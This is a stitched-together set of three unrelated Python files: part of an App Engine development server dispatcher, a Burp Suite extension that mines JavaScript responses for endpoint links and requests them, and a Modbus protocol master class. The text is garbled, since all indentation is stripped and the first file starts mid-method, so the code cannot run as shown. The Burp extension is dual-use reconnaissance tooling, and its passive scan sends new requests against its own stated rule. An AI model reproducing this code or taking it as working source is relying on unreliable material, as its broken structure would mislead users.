logging.info('Waiting for instances to finish serving requests')
deadline = time.time() + constants.MAX_INSTANCE_RESPONSE_TIME
while True:
if time.time() > deadline:
logging.error('Request timeout while shutting down')
break
requests_in_progress = False
for _module in self._module_name_to_module.values():
with _module.graceful_shutdown_lock:
if _module.request_count > 0:
requests_in_progress = True
if not requests_in_progress:
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
if logservice.is_elk_enabled:
logging.info('Waiting for Request Logger to finish.')
logservice.stop_requests_logger()
while logservice.is_requests_logger_alive():
time.sleep(.5)
logging.info('Request Logger has finished.')
break
time.sleep(.5)
# End AppScale
for _module in self._module_name_to_module.values():
_module.quit()
def _create_module(self, module_configuration, port):
max_instances = self._module_to_max_instances.get(
module_configuration.module_name)
threadsafe_override = self._module_to_threadsafe_override.get(
module_configuration.module_name)
module_args = (module_configuration,
self._host,
port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._port,
self._port_registry,
self._request_data,
self,
max_instances,
self._use_mtime_file_watcher,
self._automatic_restart,
self._allow_skipped_files,
threadsafe_override)
if module_configuration.manual_scaling:
_module = module.ManualScalingModule(*module_args)
elif module_configuration.basic_scaling:
_module = module.BasicScalingModule(*module_args)
else:
_module = module.AutoScalingModule(*module_args)
if port != 0:
port += 1000
return _module, port
@property
def modules(self):
return self._module_name_to_module.values()
def get_hostname(self, module_name, version, instance_id=None):
"""Returns the hostname for a (module, version, instance_id) tuple.
If instance_id is set, this will return a hostname for that particular
instances. Otherwise, it will return the hostname for load-balancing.
Args:
module_name: A str containing the name of the module.
version: A str containing the version.
instance_id: An optional str containing the instance ID.
Returns:
A str containing the hostname.
Raises:
request_info.ModuleDoesNotExistError: The module does not exist.
request_info.VersionDoesNotExistError: The version does not exist.
request_info.InvalidInstanceIdError: The instance ID is not valid for the
module/version or the module/version uses automatic scaling.
"""
_module = self._get_module(module_name, version)
if instance_id is None:
return _module.balanced_address
else:
return _module.get_instance_address(instance_id)
def get_module_names(self):
"""Returns a list of module names."""
return list(self._module_name_to_module)
def get_module_by_name(self, _module):
"""Returns the module with the given name.
Args:
_module: A str containing the name of the module.
Returns:
The module.Module with the provided name.
Raises:
request_info.ModuleDoesNotExistError: The module does not exist.
"""
try:
return self._module_name_to_module[_module]
except KeyError:
raise request_info.ModuleDoesNotExistError(_module)
def get_versions(self, _module):
"""Returns a list of versions for a module.
Args:
_module: A str containing the name of the module.
Returns:
A list of str containing the versions for the specified module.
Raises:
request_info.ModuleDoesNotExistError: The module does not exist.
"""
if _module in self._module_configurations:
return [self._module_configurations[_module].major_version]
else:
raise request_info.ModuleDoesNotExistError(_module)
def get_default_version(self, _module):
"""Returns the default version for a module.
Args:
_module: A str containing the name of the module.
Returns:
A str containing the default version for the specified module.
Raises:
request_info.ModuleDoesNotExistError: The module does not exist.
"""
if _module in self._module_configurations:
return self._module_configurations[_module].major_version
else:
raise request_info.ModuleDoesNotExistError(_module)
def add_event(self, runnable, eta, service=None, event_id=None):
"""Add a callable to be run at the specified time.
Args:
runnable: A callable object to call at the specified time.
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
This should be set if event_id is set.
event_id: A str containing the id of the event. If set, this can be passed
to update_event to change the time at which the event should run.
"""
if service is not None and event_id is not None:
key = (service, event_id)
else:
key = None
self._executor.add_event(runnable, eta, key)
def update_event(self, eta, service, event_id):
"""Update the eta of a scheduled event.
Args:
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
event_id: A str containing the id of the event to update.
"""
self._executor.update_event(eta, (service, event_id))
def _get_module(self, module_name, version):
if not module_name or module_name not in self._module_name_to_module:
if 'default' in self._module_name_to_module:
module_name = 'default'
elif self._module_name_to_module:
# If there is no default module, but there are other modules, take any.
# This is somewhat of a hack, and can be removed if we ever enforce the
# existence of a default module.
module_name = self._module_name_to_module.keys()[0]
else:
raise request_info.ModuleDoesNotExistError(module_name)
elif (version is not None and
version != self._module_configurations[module_name].major_version):
raise request_info.VersionDoesNotExistError()
return self._module_name_to_module[module_name]
def set_num_instances(self, module_name, version, num_instances):
"""Sets the number of instances to run for a version of a module.
Args:
module_name: A str containing the name of the module.
version: A str containing the version.
num_instances: An int containing the number of instances to run.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
self._get_module(module_name, version).set_num_instances(num_instances)
def get_num_instances(self, module_name, version):
"""Returns the number of instances running for a version of a module.
Returns:
An int containing the number of instances running for a module version.
Args:
module_name: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
return self._get_module(module_name, version).get_num_instances()
def start_module(self, module_name, version):
"""Starts a module.
Args:
module_name: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
self._get_module(module_name, version).resume()
def stop_module(self, module_name, version):
"""Stops a module.
Args:
module_name: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
self._get_module(module_name, version).suspend()
def send_background_request(self, module_name, version, inst,
background_request_id):
"""Dispatch a background thread request.
Args:
module_name: A str containing the module name to service this
request.
version: A str containing the version to service this request.
inst: The instance to service this request.
background_request_id: A str containing the unique background thread
request identifier.
Raises:
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
BackgroundThreadLimitReachedError: The instance is at its background
thread capacity.
"""
_module = self._get_module(module_name, version)
try:
inst.reserve_background_thread()
except instance.CannotAcceptRequests:
raise request_info.BackgroundThreadLimitReachedError()
port = _module.get_instance_port(inst.instance_id)
environ = _module.build_request_environ(
'GET', '/_ah/background',
[('X-AppEngine-BackgroundRequest', background_request_id)],
'', '0.1.0.3', port)
_THREAD_POOL.submit(self._handle_request,
environ,
start_response_utils.null_start_response,
_module,
inst,
request_type=instance.BACKGROUND_REQUEST,
catch_and_log_exceptions=True)
# TODO: Think of better names for add_async_request and
# add_request.
def add_async_request(self, method, relative_url, headers, body, source_ip,
module_name=None, version=None, instance_id=None):
"""Dispatch an HTTP request asynchronously.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
module_name: An optional str containing the module name to service this
request. If unset, the request will be dispatched to the default
module.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the module and version.
"""
if module_name:
_module = self._get_module(module_name, version)
else:
_module = self._module_for_request(urlparse.urlsplit(relative_url).path)
inst = _module.get_instance(instance_id) if instance_id else None
port = _module.get_instance_port(instance_id) if instance_id else (
_module.balanced_port)
environ = _module.build_request_environ(method, relative_url, headers, body,
source_ip, port)
_THREAD_POOL.submit(self._handle_request,
environ,
start_response_utils.null_start_response,
_module,
inst,
catch_and_log_exceptions=True)
def add_request(self, method, relative_url, headers, body, source_ip,
module_name=None, version=None, instance_id=None,
fake_login=False):
"""Process an HTTP request.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
module_name: An optional str containing the module name to service this
request. If unset, the request will be dispatched according to the
host header and relative_url.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched according to the host header
and relative_url.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched
according to the host header and relative_url and, if applicable, the
load-balancing for the module and version.
fake_login: A bool indicating whether login checks should be bypassed,
i.e. "login: required" should be ignored for this request.
Returns:
A request_info.ResponseTuple containing the response information for the
HTTP request.
"""
if module_name:
_module = self._get_module(module_name, version)
inst = _module.get_instance(instance_id) if instance_id else None
else:
headers_dict = wsgiref.headers.Headers(headers)
_module, inst = self._resolve_target(
headers_dict['Host'], urlparse.urlsplit(relative_url).path)
if inst:
try:
port = _module.get_instance_port(inst.instance_id)
except request_info.NotSupportedWithAutoScalingError:
port = _module.balanced_port
else:
port = _module.balanced_port
environ = _module.build_request_environ(method, relative_url, headers, body,
source_ip, port,
fake_login=fake_login)
start_response = start_response_utils.CapturingStartResponse()
response = self._handle_request(environ,
start_response,
_module,
inst)
return request_info.ResponseTuple(start_response.status,
start_response.response_headers,
start_response.merged_response(response))
def _resolve_target(self, hostname, path):
"""Returns the module and instance that should handle this request.
Args:
hostname: A string containing the value of the host header in the request
or None if one was not present.
path: A string containing the path of the request.
Returns:
A tuple (_module, inst) where:
_module: The module.Module that should handle this request.
inst: The instance.Instance that should handle this request or None if
the module's load balancing should decide on the instance.
Raises:
request_info.ModuleDoesNotExistError: if hostname is not known.
"""
if self._port == 80:
default_address = self.host
else:
default_address = '%s:%s' % (self.host, self._port)
if not hostname or hostname == default_address:
return self._module_for_request(path), None
default_address_offset = hostname.find(default_address)
if default_address_offset > 0:
prefix = hostname[:default_address_offset - 1]
if '.' in prefix:
raise request_info.ModuleDoesNotExistError(prefix)
return self._get_module(prefix, None), None
else:
port = int(os.environ['MY_PORT'])
try:
_module, inst = self._port_registry.get(port)
except KeyError:
raise request_info.ModuleDoesNotExistError(hostname)
if not _module:
_module = self._module_for_request(path)
return _module, inst
def _handle_request(self, environ, start_response, _module,
inst=None, request_type=instance.NORMAL_REQUEST,
catch_and_log_exceptions=False):
"""Dispatch a WSGI request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
_module: The module to dispatch this request to.
inst: The instance to service this request. If None, the module will
be left to choose the instance to serve this request.
request_type: The request_type of this request. See instance.*_REQUEST
module constants.
catch_and_log_exceptions: A bool containing whether to catch and log
exceptions in handling the request instead of leaving it for the
caller to handle.
Returns:
An iterable over the response to the request as defined in PEP-333.
"""
try:
return _module._handle_request(environ, start_response, inst=inst,
request_type=request_type)
except:
if catch_and_log_exceptions:
logging.exception('Internal error while handling request.')
else:
raise
def __call__(self, environ, start_response):
return self._handle_request(
environ, start_response, self._module_for_request(environ['PATH_INFO']))
def _module_for_request(self, path):
dispatch = self._configuration.dispatch
if dispatch:
for url, module_name in dispatch.dispatch:
if (url.path_exact and path == url.path or
not url.path_exact and path.startswith(url.path)):
return self._get_module(module_name, None)
return self._get_module(None, None)
|
FransLinkfinder.py | #
# BurpLinkFinder - Find links within JS files.
#
# Copyright (c) 2019 Frans Hendrik Botes
# Credit to https://github.com/GerbenJavado/LinkFinder for the idea and regex
#
from burp import IBurpExtender, IScannerCheck, IScanIssue, ITab
from java.io import PrintWriter
from java.net import URL
from java.util import ArrayList, List
from java.util.regex import Matcher, Pattern
import binascii
import base64
import re
from javax import swing
from java.awt import Font, Color
from threading import Thread
from array import array
from java.awt import EventQueue
from java.lang import Runnable
from thread import start_new_thread
from javax.swing import JFileChooser
from urlparse import urlparse
# Using the Runnable class for thread-safety with Swing
class Run(Runnable):
def __init__(self, runner):
self.runner = runner
def run(self):
self.runner()
# Needed params
class BurpExtender(IBurpExtender, IScannerCheck, ITab):
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.helpers = callbacks.getHelpers()
callbacks.setExtensionName("BurpJSLinkFinder")
callbacks.issueAlert("BurpJSLinkFinder Passive Scanner enabled")
self.stdout = PrintWriter(callbacks.getStdout(), True)
self.stderr = PrintWriter(callbacks.getStderr(), True)
callbacks.registerScannerCheck(self)
self.initUI()
self.callbacks.addSuiteTab(self)
print ("Burp JS LinkFinder loaded.")
print ("Copyright (c) 2019 Frans Hendrik Botes")
self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n")
self.dynamicExclusionList = None
self.lastKnownOrigin = ''
self.lastKnownReferer = ''
self.load_config()
def initUI(self):
self.tab = swing.JPanel()
# UI for Output
self.outputLabel = swing.JLabel("LinkFinder Log:")
self.outputLabel.setFont(Font("Tahoma", Font.BOLD, 14))
self.outputLabel.setForeground(Color(255,102,52))
self.logPane = swing.JScrollPane()
self.outputTxtArea = swing.JTextArea()
self.outputTxtArea.setFont(Font("Consolas", Font.PLAIN, 12))
self.outputTxtArea.setLineWrap(True)
self.logPane.setViewportView(self.outputTxtArea)
self.clearBtn = swing.JButton("Clear Log", actionPerformed=self.clearLog)
self.exportBtn = swing.JButton("Export Log", actionPerformed=self.exportLog)
self.parentFrm = swing.JFileChooser()
self.exclusionLabel = swing.JLabel("Exclusion list (separated by by comma):")
self.exclusionInput = swing.JTextField(focusLost=self.save_config)
# Layout
layout = swing.GroupLayout(self.tab)
layout.setAutoCreateGaps(True)
layout.setAutoCreateContainerGaps(True)
self.tab.setLayout(layout)
layout.setHorizontalGroup(
layout.createParallelGroup()
.addGroup(layout.createSequentialGroup()
.addGroup(layout.createParallelGroup()
.addComponent(self.exclusionLabel)
.addComponent(self.exclusionInput)
.addComponent(self.outputLabel)
.addComponent(self.logPane)
.addComponent(self.clearBtn)
.addComponent(self.exportBtn)
)
)
)
layout.setVerticalGroup(
layout.createParallelGroup()
.addGroup(layout.createParallelGroup()
.addGroup(layout.createSequentialGroup()
.addComponent(self.exclusionLabel)
.addComponent(self.exclusionInput)
.addComponent(self.outputLabel)
.addComponent(self.logPane)
.addComponent(self.clearBtn)
.addComponent(self.exportBtn)
)
)
)
def getTabCaption(self):
return "BurpJSLinkFinder"
def getUiComponent(self):
return self.tab
def clearLog(self, event):
self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n" )
def exportLog(self, event):
chooseFile = JFileChooser()
ret = chooseFile.showDialog(self.logPane, "Choose file")
filename = chooseFile.getSelectedFile().getCanonicalPath()
print("\n" + "Export to : " + filename)
open(filename, 'w', 0).write(self.outputTxtArea.text)
def save_config(self, event):
self.dynamicExclusionList = self.exclusionInput.getText().strip()
self.callbacks.saveExtensionSetting('exclusion_list', self.exclusionInput.getText().strip())
def load_config(self):
self.dynamicExclusionList = self.callbacks.loadExtensionSetting('exclusion_list') if self.callbacks.loadExtensionSetting('exclusion_list') else ''
self.exclusionInput.setText(self.dynamicExclusionList)
def make_request(self, base_request_url, link_found):
'''
Make a new request using Burp and analyze the response.
If returns 200: add to sitemap
url: string
'''
# Parse base_request_url
parsed_base_url = urlparse(base_request_url)
base_http_protocol = parsed_base_url.scheme
base_address_and_port = parsed_base_url.netloc.split(':')
base_host = base_address_and_port[0]
if len(base_address_and_port) > 1 and base_address_and_port[1]:
base_port = int(base_address_and_port[1])
else:
base_port = 80 if (base_http_protocol == 'http') else 443
# Try to make a valid URL from Origin + path found
if link_found.startswith('http://') or link_found.startswith('https://'):
target_url = link_found
elif link_found.startswith('//'):
target_url = base_http_protocol + ':' + link_found
elif link_found.startswith('/'):
target_url = base_http_protocol + '://' + base_host + ':' + str(base_port) + link_found
else:
target_url = base_http_protocol + '://' + base_host + ':' + str(base_port) + '/' + link_found
# Print the formated target URL
# self.outputTxtArea.append("\n" + "\t" + "--->" + target_url)
# Parse target_url
parsed_url = urlparse(target_url)
http_protocol = parsed_url.scheme
address_and_port = parsed_url.netloc.split(':')
host = address_and_port[0]
if len(address_and_port) > 1 and address_and_port[1]:
port = int(address_and_port[1])
else:
port = 80 if (http_protocol == 'http') else 443
# Make request to the URL
get_query = ''
if parsed_url.query:
get_query = '?' + parsed_url.query
my_new_request_headers = [
'GET ' + parsed_url.path + get_query + ' HTTP/1.1',
'host: ' + host + ':' + str(port)
]
my_new_request_body = ''
my_new_request = self.helpers.buildHttpMessage(
my_new_request_headers,
self.helpers.stringToBytes(my_new_request_body)
)
# Send request
my_http_service = self.helpers.buildHttpService(host, port, http_protocol)
my_new_http_request_response = self.callbacks.makeHttpRequest(
my_http_service,
my_new_request
)
# Analyze the response
if my_new_http_request_response.getResponse():
analyzed_response = self.helpers.analyzeResponse(my_new_http_request_response.getResponse())
if analyzed_response:
status_code = analyzed_response.getStatusCode()
# Debug target and http code
# print('--> Request to ' + target_url + ' | HTTP Code: ' + str(status_code))
# Logic for adding to sitemap is here
if status_code in [200]:
self.callbacks.addToSiteMap(my_new_http_request_response)
def doPassiveScan(self, ihrr):
'''
The Scanner invokes this method for each base request / response that is passively scanned.
Note: Extensions should only analyze the HTTP messages provided during passive scanning, and should not make any new HTTP requests of their own.
'''
try:
analyzed_request = self.helpers.analyzeRequest(ihrr.getRequest())
request_headers = analyzed_request.getHeaders()
# Get Referer or origin to make a request
origin = self.lastKnownOrigin
referer = self.lastKnownReferer
for header in request_headers:
if header.lower().startswith('referer'):
[header_name, referer] = header.replace(' ','').split(':', 1)
self.lastKnownReferer = referer
if header.lower().startswith('origin'):
[header_name, origin] = header.replace(' ','').split(':', 1)
self.lastKnownOrigin = origin
urlReq = ihrr.getUrl()
testString = str(urlReq)
linkA = linkAnalyse(ihrr,self.helpers)
# check if JS file
if ".js" in str(urlReq):
# Exclude casual JS files
self.dynamicExclusionList = str(self.exclusionInput.getText().strip()).split(',') if str(self.exclusionInput.getText().strip()) else None
if self.dynamicExclusionList and any(x in testString for x in self.dynamicExclusionList):
print("\n" + "[-] URL excluded " + str(urlReq))
else:
self.outputTxtArea.append("\n" + "[+] Valid URL found: " + str(urlReq))
issueText = linkA.analyseURL()
for counter, issueText in enumerate(issueText):
#print("TEST Value returned SUCCESS")
self.outputTxtArea.append("\n" + "\t" + str(counter)+' - ' +issueText['link'])
if self.lastKnownOrigin:
self.make_request(self.lastKnownOrigin, issueText['link'])
else:
if self.lastKnownReferer:
self.make_request(self.lastKnownReferer, issueText['link'])
issues = ArrayList()
issues.add(SRI(ihrr, self.helpers))
return issues
except UnicodeEncodeError:
print ("Error in URL decode.")
return None
def consolidateDuplicateIssues(self, isb, isa):
return -1
def extensionUnloaded(self):
print "Burp JS LinkFinder unloaded"
return
class linkAnalyse():
def __init__(self, reqres, helpers):
self.helpers = helpers
self.reqres = reqres
regex_str = """
(?:"|') # Start newline delimiter
(
((?:[a-zA-Z]{1,10}://|//) # Match a scheme [a-Z]*1-10 or //
[^"'/]{1,}\. # Match a domainname (any character + dot)
[a-zA-Z]{2,}[^"']{0,}) # The domainextension and/or path
|
((?:/|\.\./|\./) # Start with /,../,./
[^"'><,;| *()(%%$^/\\\[\]] # Next character can't be...
[^"'><,;|()]{1,}) # Rest of the characters can't be
|
([a-zA-Z0-9_\-/]{1,}/ # Relative endpoint with /
[a-zA-Z0-9_\-/]{1,} # Resource name
\.(?:[a-zA-Z]{1,4}|action) # Rest + extension (length 1-4 or action)
(?:[\?|/][^"|']{0,}|)) # ? mark with parameters
|
([a-zA-Z0-9_\-]{1,} # filename
\.(?:php|asp|aspx|jsp|json|
action|html|js|txt|xml) # . + extension
(?:\?[^"|']{0,}|)) # ? mark with parameters
)
(?:"|') # End newline delimiter
"""
def parser_file(self, content, regex_str, mode=1, more_regex=None, no_dup=1):
#print ("TEST parselfile #2")
regex = re.compile(regex_str, re.VERBOSE)
items = [{"link": m.group(1)} for m in re.finditer(regex, content)]
if no_dup:
# Remove duplication
all_links = set()
no_dup_items = []
for item in items:
if item["link"] not in all_links:
all_links.add(item["link"])
no_dup_items.append(item)
items = no_dup_items
# Match Regex
filtered_items = []
for item in items:
# Remove other capture groups from regex results
if more_regex:
if re.search(more_regex, item["link"]):
#print ("TEST parselfile #3")
filtered_items.append(item)
else:
filtered_items.append(item)
return filtered_items
# Potential for use in the future...
def threadAnalysis(self):
thread = Thread(target=self.analyseURL(), args=(session,))
thread.daemon = True
thread.start()
def analyseURL(self):
endpoints = ""
#print("TEST AnalyseURL #1")
mime_type=self.helpers.analyzeResponse(self.reqres.getResponse()).getStatedMimeType()
if mime_type.lower() == 'script':
url = self.reqres.getUrl()
encoded_resp=binascii.b2a_base64(self.reqres.getResponse())
decoded_resp=base64.b64decode(encoded_resp)
endpoints=self.parser_file(decoded_resp, self.regex_str)
#print("TEST AnalyseURL #2")
return endpoints
return endpoints
class SRI(IScanIssue,ITab):
def __init__(self, reqres, helpers):
self.helpers = helpers
self.reqres = reqres
def getHost(self):
return self.reqres.getHost()
def getPort(self):
return self.reqres.getPort()
def getProtocol(self):
return self.reqres.getProtocol()
def getUrl(self):
return self.reqres.getUrl()
def getIssueName(self):
return "Linkfinder Analysed JS files"
def getIssueType(self):
return 0x08000000 # See http:#portswigger.net/burp/help/scanner_issuetypes.html
def getSeverity(self):
return "Information" # "High", "Medium", "Low", "Information" or "False positive"
def getConfidence(self):
return "Certain" # "Certain", "Firm" or "Tentative"
def getIssueBackground(self):
return str("JS files holds links to other parts of web applications. Refer to TAB for results.")
def getRemediationBackground(self):
return "This is an <b>informational</b> finding only.<br>"
def getIssueDetail(self):
return str("Burp Scanner has analysed the following JS file for links: <b>"
"%s</b><br><br>" % (self.reqres.getUrl().toString()))
def getRemediationDetail(self):
return None
def getHttpMessages(self):
#print ("................raising issue................")
rra = [self.reqres]
return rra
def getHttpService(self):
return self.reqres.getHttpService()
if __name__ in ('__main__', 'main'):
EventQueue.invokeLater(Run(BurpExtender))
|
modbus.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Modbus TestKit: Implementation of Modbus protocol in python
(C)2009 - Luc Jean - luc.jean@gmail.com
(C)2009 - Apidev - http://www.apidev.fr
This is distributed under GNU LGPL license, see license.txt
History:
2010/01/08 - RD: Update master.execute(..) to calculate lengths automatically based on requested command
"""
from __future__ import with_statement
import struct
import threading
from modbus_tk import LOGGER
from modbus_tk import defines
from modbus_tk.exceptions import(
ModbusError, ModbusFunctionNotSupportedError, DuplicatedKeyError, MissingKeyError, InvalidModbusBlockError,
InvalidArgumentError, OverlapModbusBlockError, OutOfModbusBlockError, ModbusInvalidResponseError,
ModbusInvalidRequestError
)
from modbus_tk.hooks import call_hooks
from modbus_tk.utils import threadsafe_function, get_log_buffer
# modbus_tk is using the python logging mechanism
# you can define this logger in your app in order to see its prints logs
class Query(object):
"""
Interface to be implemented in subclass for every specific modbus MAC layer
"""
def __init__(self):
"""Constructor"""
pass
def build_request(self, pdu, slave):
"""
Get the modbus application protocol request pdu and slave id
Encapsulate with MAC layer information
Returns a string
"""
raise NotImplementedError()
def parse_response(self, response):
"""
Get the full response and extract the modbus application protocol
response pdu
Returns a string
"""
raise NotImplementedError()
def parse_request(self, request):
"""
Get the full request and extract the modbus application protocol
request pdu
Returns a string and the slave id
"""
raise NotImplementedError()
def build_response(self, response_pdu):
"""
Get the modbus application protocol response pdu and encapsulate with
MAC layer information
Returns a string
"""
raise NotImplementedError()
class Master(object):
"""
This class implements the Modbus Application protocol for a master
To be subclassed with a class implementing the MAC layer
"""
def __init__(self, timeout_in_sec, hooks=None):
"""Constructor: can define a timeout"""
self._timeout = timeout_in_sec
self._verbose = False
self._is_opened = False
def __del__(self):
"""Destructor: close the connection"""
self.close()
def set_verbose(self, verbose):
"""print some more log prints for debug purpose"""
self._verbose = verbose
def open(self):
"""open the communication with the slave"""
if not self._is_opened:
self._do_open()
self._is_opened = True
def close(self):
"""close the communication with the slave"""
if self._is_opened:
ret = self._do_close()
if ret:
self._is_opened = False
def _do_open(self):
"""Open the MAC layer"""
raise NotImplementedError()
def _do_close(self):
"""Close the MAC layer"""
raise NotImplementedError()
def _send(self, buf):
"""Send data to a slave on the MAC layer"""
raise NotImplementedError()
def _recv(self, expected_length):
"""
Receive data from a slave on the MAC layer
if expected_length is >=0 then consider that the response is done when this
number of bytes is received
"""
raise NotImplementedError()
def _make_query(self):
"""
Returns an instance of a Query subclass implementing
the MAC layer protocol
"""
raise NotImplementedError()
@threadsafe_function
def execute(
self, slave, function_code, starting_address, quantity_of_x=0, output_value=0, data_format="", expected_length=-1, write_starting_address_FC23=0):
"""
Execute a modbus query and returns the data part of the answer as a tuple
The returned tuple depends on the query function code. see modbus protocol
specification for details
data_format makes possible to extract the data like defined in the
struct python module documentation
"""
pdu = ""
is_read_function = False
nb_of_digits = 0
# open the connection if it is not already done
self.open()
# Build the modbus pdu and the format of the expected data.
# It depends of function code. see modbus specifications for details.
if function_code == defines.READ_COILS or function_code == defines.READ_DISCRETE_INPUTS:
is_read_function = True
pdu = struct.pack(">BHH", function_code, starting_address, quantity_of_x)
byte_count = quantity_of_x // 8
if (quantity_of_x % 8) > 0:
byte_count += 1
nb_of_digits = quantity_of_x
if not data_format:
data_format = ">" + (byte_count * "B")
if expected_length < 0:
# No length was specified and calculated length can be used:
# slave + func + bytcodeLen + bytecode + crc1 + crc2
expected_length = byte_count + 5
elif function_code == defines.READ_INPUT_REGISTERS or function_code == defines.READ_HOLDING_REGISTERS:
is_read_function = True
pdu = struct.pack(">BHH", function_code, starting_address, quantity_of_x)
if not data_format:
data_format = ">" + (quantity_of_x * "H")
if expected_length < 0:
# No length was specified and calculated length can be used:
# slave + func + bytcodeLen + bytecode x 2 + crc1 + crc2
expected_length = 2 * quantity_of_x + 5
elif (function_code == defines.WRITE_SINGLE_COIL) or (function_code == defines.WRITE_SINGLE_REGISTER):
if function_code == defines.WRITE_SINGLE_COIL:
if output_value != 0:
output_value = 0xff00
fmt = ">BHH"
else:
fmt = ">BH"+("H" if output_value >= 0 else "h")
pdu = struct.pack(fmt, function_code, starting_address, output_value)
if not data_format:
data_format = ">HH"
if expected_length < 0:
# No length was specified and calculated length can be used:
# slave + func + adress1 + adress2 + value1+value2 + crc1 + crc2
expected_length = 8
elif function_code == defines.WRITE_MULTIPLE_COILS:
byte_count = len(output_value) // 8
if (len(output_value) % 8) > 0:
byte_count += 1
pdu = struct.pack(">BHHB", function_code, starting_address, len(output_value), byte_count)
i, byte_value = 0, 0
for j in output_value:
if j > 0:
byte_value += pow(2, i)
if i == 7:
pdu += struct.pack(">B", byte_value)
i, byte_value = 0, 0
else:
i += 1
if i > 0:
pdu += struct.pack(">B", byte_value)
if not data_format:
data_format = ">HH"
if expected_length < 0:
# No length was specified and calculated length can be used:
# slave + func + adress1 + adress2 + outputQuant1 + outputQuant2 + crc1 + crc2
expected_length = 8
elif function_code == defines.WRITE_MULTIPLE_REGISTERS:
if output_value and data_format:
byte_count = struct.calcsize(data_format)
else:
byte_count = 2 * len(output_value)
pdu = struct.pack(">BHHB", function_code, starting_address, byte_count // 2, byte_count)
if output_value and data_format:
pdu += struct.pack(data_format, *output_value)
else:
for j in output_value:
fmt = "H" if j >= 0 else "h"
pdu += struct.pack(">" + fmt, j)
# data_format is now used to process response which is always 2 registers:
# 1) data address of first register, 2) number of registers written
data_format = ">HH"
if expected_length < 0:
# No length was specified and calculated length can be used:
# slave + func + adress1 + adress2 + outputQuant1 + outputQuant2 + crc1 + crc2
expected_length = 8
elif function_code == defines.READ_EXCEPTION_STATUS:
pdu = struct.pack(">B", function_code)
data_format = ">B"
if expected_length < 0:
# No length was specified and calculated length can be used:
expected_length = 5
elif function_code == defines.DIAGNOSTIC:
# SubFuncCode are in starting_address
pdu = struct.pack(">BH", function_code, starting_address)
if len(output_value) > 0:
for j in output_value:
# copy data in pdu
pdu += struct.pack(">B", j)
if not data_format:
data_format = ">" + (len(output_value) * "B")
if expected_length < 0:
# No length was specified and calculated length can be used:
# slave + func + SubFunc1 + SubFunc2 + Data + crc1 + crc2
expected_length = len(output_value) + 6
elif function_code == defines.READ_WRITE_MULTIPLE_REGISTERS:
is_read_function = True
byte_count = 2 * len(output_value)
pdu = struct.pack(
">BHHHHB",
function_code, starting_address, quantity_of_x, write_starting_address_FC23,
len(output_value), byte_count
)
for j in output_value:
fmt = "H" if j >= 0 else "h"
# copy data in pdu
pdu += struct.pack(">"+fmt, j)
if not data_format:
data_format = ">" + (quantity_of_x * "H")
if expected_length < 0:
# No lenght was specified and calculated length can be used:
# slave + func + bytcodeLen + bytecode x 2 + crc1 + crc2
expected_length = 2 * quantity_of_x + 5
else:
raise ModbusFunctionNotSupportedError("The {0} function code is not supported. ".format(function_code))
# instantiate a query which implements the MAC (TCP or RTU) part of the protocol
query = self._make_query()
# add the mac part of the protocol to the request
request = query.build_request(pdu, slave)
# send the request to the slave
retval = call_hooks("modbus.Master.before_send", (self, request))
if retval is not None:
request = retval
if self._verbose:
LOGGER.debug(get_log_buffer("-> ", request))
self._send(request)
call_hooks("modbus.Master.after_send", (self, ))
if slave != 0:
# receive the data from the slave
response = self._recv(expected_length)
retval = call_hooks("modbus.Master.after_recv", (self, response))
if retval is not None:
response = retval
if self._verbose:
LOGGER.debug(get_log_buffer("<- ", response))
# extract the pdu part of the response
response_pdu = query.parse_response(response)
# analyze the received data
(return_code, byte_2) = struct.unpack(">BB", response_pdu[0:2])
if return_code > 0x80:
# the slave has returned an error
exception_code = byte_2
raise ModbusError(exception_code)
else:
if is_read_function:
# get the values returned by the reading function
byte_count = byte_2
data = response_pdu[2:]
if byte_count != len(data):
# the byte count in the pdu is invalid
raise ModbusInvalidResponseError(
"Byte count is {0} while actual number of bytes is {1}. ".format(byte_count, len(data))
)
else:
# returns what is returned by the slave after a writing function
data = response_pdu[1:]
# returns the data as a tuple according to the data_format
# (calculated based on the function or user-defined)
result = struct.unpack(data_format, data)
if nb_of_digits > 0:
digits = []
for byte_val in result:
for i in range(8):
if len(digits) >= nb_of_digits:
break
digits.append(byte_val % 2)
byte_val = byte_val >> 1
result = tuple(digits)
return result
def set_timeout(self, timeout_in_sec):
"""Defines a timeout on the MAC layer"""
self._timeout = timeout_in_sec
